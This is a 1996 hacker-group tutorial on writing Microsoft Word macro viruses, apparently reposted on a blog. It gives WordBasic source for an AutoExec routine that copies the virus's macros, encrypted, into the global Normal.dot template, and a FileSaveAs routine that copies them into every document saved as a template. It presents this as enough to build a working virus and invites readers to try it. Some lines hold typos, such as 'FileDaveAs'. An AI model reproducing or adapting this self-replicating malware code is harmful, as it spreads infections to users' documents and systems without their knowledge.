I shall not be held responsible for any damage created be direct or indirect use of the publicised material. This document is copyright 1996 to me, Dark Night of VBB. Herewith I grant anybody license to redistribute this document as long as it is kept in whole and my copyright notice is not removed. Also if I find any lamers who just take the code published here and say it is their own I will see that they'll be punished. (Believe it or not :-))!!!
Introduction
Many of you may be wondering right now who the hell I am and who VBB is. Come on lamers! Get alive. VBB is one of the coolest virus groups around. You can't tell me you've never heard of us. Well, Ok I'll admit it. We're not that popular yet, but that'll come. So for now here's my contribution to the group as the leader. Welcome to the macro virus writing tutorial part 1.
The tools
First of all you'll need MS Word 6.0 or up (duh), then you may want to get VBB's macro disassembler by Aurodreph so that you can study encrypted macros. Also you should make back-ups of your normal. DOT template in your WINWORD6\TEMPLATE\ directory, as this is the document commonly infected by macro virii. So whatch out. Also I recommend to have at least a small knowledge of word basic, so that you kind a know what's going on. Well, that's it. You've made it this far. It's now time to get into the macro virus generals.
The general stuff
Most macro virii have a pretty set structure. They start of with an auto-executing macro which infects the normal.dot(global) template. Then they have some macros which will infect the files on certain actions. For example FileSaveAs, FileSave, FileOpen, ToolsMacros. Documents are infected through transferring the macros into the document and having them execute the next time the document is opened. A code for the autoexec routine would look something like this:
'ANYTHING AFTER THE ' ARE MY COMMENTS
Sub MAIN
On Error Goto Abort
iMacroCount = CountMacros(0, 0)
'CHECK TO SEE IF INFECTION EXISTS
For i = 1 To iMacroCount
If MacroName$(i, 0, 0) = "PayLoad" Then
bInstalled = - 1
'BY LOOKING FOT THE PAYLOAD MACRO
End If
If MacroName$(i, 0, 0) = "FileSaveAs" Then
bTooMuchTrouble = - 1
'BUT IF THE FILESAVEAS MACRO EXISTS THEN INFECTION IS
'TOO DIFICULT.
End If
Next i
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoExec and FileSaveAs.
'Payload has no use except to check for infection.
'The ,1 encrypts all macros in their destination making
'them unreadble in Word.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
Macro$ = sMe$ + ":PayLoad"
MacroCopy Macro$, "Global:PayLoad", 1
Macro$ = sMe$ + ":FileOpen"
MacroCopy Macro$, "Global:FileOpen", 1
Macro$ = sMe$ + ":FileSaveAs"
MacroCopy Macro$, "Global:FileSaveAs", 1
Macro$ = sMe$ + ":AutoExec"
MacroCopy Macro$, "Global:AutoExec", 1
SetProfileString "WW6I", Str$(iWW6IInstance + 1)
End If
Abort:
End Sub
The SaveAs routine
This is the routine which copies the macro virus into the active document when it is saved using File/Save As. It uses much of the same techniques as the AutoExec routine. Here's what the code should look like for the SaveAs routine:
'YOU CAN ALWAYS USE THE ,1 AGAIN TO ENCRYPT MACROS.
Sub MAIN
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
If (Dlg.Format = 0) Or (dlg.Format = 1) Then
MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs"
MacroCopy "FileSave ", WindowName$() + ":FileSave"
MacroCopy "PayLoad", WindowName$() + ":PayLoad"
MacroCopy "FileOpen", WindowName$() + ":FileOpen"
Dlg.Format = 1
End If
FileDaveAs dlg
End Sub
Short, but it works well. All this info, believe it or not, is enough to make a small and basic macro virus.
Happy trying..!! :)credit: netlux.org
0 komentar:
Posting Komentar